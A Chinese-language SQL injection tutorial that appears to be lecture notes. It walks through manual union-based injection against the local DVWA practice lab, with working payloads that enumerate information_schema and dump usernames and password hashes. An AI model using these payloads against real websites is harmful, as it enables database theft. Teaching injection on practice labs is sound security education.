漏洞挖掘 漏洞利用 修复漏洞

sql注入漏洞、文件操作漏洞、xss、rce、逻辑漏洞

反序列化、、、、

sql注入漏洞: 网站的数据库 脱裤 拖取网站数据库

数据库基础:

数据库基本结构:数据库 -- 数据表 -- 数据列 -- 数据

sql语句:select * from 数据表的名称 where 数据列的名称=1

web基础:

https://www.aaa.com/index.php?id=1

url:统一资源定位符

域名:www.aaa.com

?id=1 请求id为1的内容 ? get请求 post请求

select * from 数据表的名称 where id=1

拿到一个网站,怎么判断该网站是否存在sql注入漏洞?

1.找交互点 网站跟数据库进行互动的地方 url 搜索框 登录框

2.找注入点 '

看回显结果,回显结果不正常显示,就说明这个位置是一个注入点

如果一个网站存在注入点,那么说明该网站存在sql注入漏洞

int类型 整型 where id=1'

char类型 字符型 where id='1''

3.漏洞利用

①手工注入

(1)判断注入类型 and 1=1 and 1=2

1 and 1=1 and 运算符 真 and 真 真 就会正常显示1的内容

1 and 1=2 真 and 假 假 不正常显示

看回显结果,如果回显结果不一样,则为int类型,那么后续的语句正常写

反之,回显结果一样,说明是char类型,那么后面的语句 都要加上 ' 闭合 # --+ 注释

?id=1和2 1 和 2 两个人

int类型 整型 where id=1和2 1 和 2 两个人

char类型 字符型 where id='1' order by 1#' 一个人 1和2

(2)判断列数 order by 二分法 列数为2

1' order by 1#

(3)看回显位置 union select 联合查询

1' and 1=2 union select 1,2#

(4)查询数据库名称 dvwa

1' and 1=2 union select 1,database()#

(5)查询数据表的名称 guestbook users

1' and 1=2 union select 1,table_name from

information_schema.tables where table_schema='dvwa'#

information_schema //数据库的一个名称

tables //是information_schema下面的一张表

(6)查询数据列的名称 user password

1' and 1=2 union select 1,column_name from

information_schema.columns where table_name='users'#

(7)读取数据 5f4dcc3b5aa765d61d8327deb882cf99 md5 撞库

1' and 1=2 union select 1,password from users#

1' and 1=2 union select 1,concat(user,'~~~',password) from users#

admin5f4dcc3b5aa765d61d8327deb882cf99

qq:1191674313 郑渊

②工具注入 脚本小子

搭建网站:

服务器 --> 操作系统 windows Linux、

中间件 apache nginx iis tomcat、、、

数据库 mysql sqlserver access 、、、

源码

PHPstudy 一键部署网站

dvwa 靶场

访问:打开浏览器 127.0.0.1/dvwa-master

默认的账号密码:admin password

拿到一个网站,怎么判断该网站是否存在sql注入漏洞?相关推荐

  1. php网站漏洞检测对sql注入漏洞防护

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

  2. 危险!!!也许你的web网站或服务正在悄无声息地被SQL注入

    2010年秋季,联合国官方网站遭受SQL注入攻击. 2014年一个叫"TeamDigi7al"的黑客组织攻击了美国海军的一个名为"Smart Web Move" ...

  3. 白帽子发现美军网站SQL注入漏洞,可获取敏感数据

    去年有报道称,美军收购软件漏洞为网战准备.而美军自己的网站和服务器究竟又有多安全?一名独立安全研究者已经发现了美军网站的几个较为严重的安全漏洞. 安全专家称,这些漏洞说明了美国防部网络安全基础的脆弱性 ...

  4. 对搜狐 网易和TOM三大门户网站的SQL注入漏洞检测

    分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 对搜狐. ...

  5. 动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞

    动易网站管理系统vote.asp页面存在SQL注入漏洞 测试系统: 动易(PowerEasy CMS SP6 071030以下版本) 安全综述: 动易网站管理系统是一个采用 ASP 和 MSSQL 等 ...

  6. php网站漏洞检测对sql注入漏洞防护 1

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

  7. 友基科技网站sql注入漏洞

    2019独角兽企业重金招聘Python工程师标准>>> 虽然现在sql注入不像以前那么常见,但是在一些中小型网站还是会存在.如该网站某URL如图: 最简单的探测sql注入漏洞的方法, ...

  8. 网站安全测试与检测中 发现的OA系统中的SQL注入漏洞

    近日,SINE安全监测中心监控到泛微OA系统被爆出存在高危的sql注入漏洞,该移动办公OA系统,在正常使用过程中可以伪造匿名身份来进行SQL注入攻击,获取用户等隐私信息,目前该网站漏洞影响较大,使用此 ...

  9. 从一个Laravel SQL注入漏洞开始的Bug Bounty之旅

    事先声明:本次测试过程完全处于本地或授权环境,仅供学习与参考,不存在未授权测试过程.本文提到的漏洞<Cachet SQL注入漏洞(CVE-2021-39165)>已经修复,也请读者勿使用该 ...

最新文章

  1. Invocation of destroy method 'close' failed on bean with name 'sqlSession'
  2. 985 211 PHP,985 211是什么意思
  3. Windows server 2008 r2 开启Aero
  4. [css] 为什么说css的选择器是从右向左匹配?
  5. ipfs-hdfs分布式文件系统
  6. SAP License:最近事情的一些随笔
  7. centos6.5搭建vsftp服务器
  8. 加快网站速度的最佳做法_(4)避免使用css表达式
  9. 【UNITY3D 游戏开发之八】UNITY编译到IPHONE运行 COLLIDER 无法正常触发事件解决方案...
  10. HTML5新控件 - 日期和时间选择输入
  11. excel做地图热力图_如何用excel制作中国地图热力数据图
  12. mac下 eclipse支持magic mouse/Trackpad 操作
  13. 用c语言制作简易的个人通讯录管理系统
  14. .Net 调用中国气象台Web Service
  15. 【linux】分卷压缩
  16. 好的电子书资源——原创力文档
  17. 一个苦逼运维工程师的年终总结-逗哥
  18. libnet发包java语言_libnet 安装问题
  19. keyProperty、useGeneratedKeys和keyColumn
  20. 学Android移动开发 第1章 Android基础入门

热门文章

  1. Serialize的使用
  2. 配置tomcat使用https方式连接,同时也可以使用http方式连接
  3. 自建OTA服务器实现设备固件自动更新
  4. 拨号服务器应用场景有哪些?
  5. Scalar类-颜色类
  6. 解决物理机为ubuntu与virtualbox客户机为windows10间剪切板不能用的问题
  7. vue2中取消严格检查模式/关闭语法检查
  8. ADI Blackfin DSP处理器-BF533的开发详解60:DSP控制ADXL345三轴加速度传感器-电子水平仪(含源码)
  9. parameterType的用法
  10. .net 2.0 下的FTP搜索引擎实现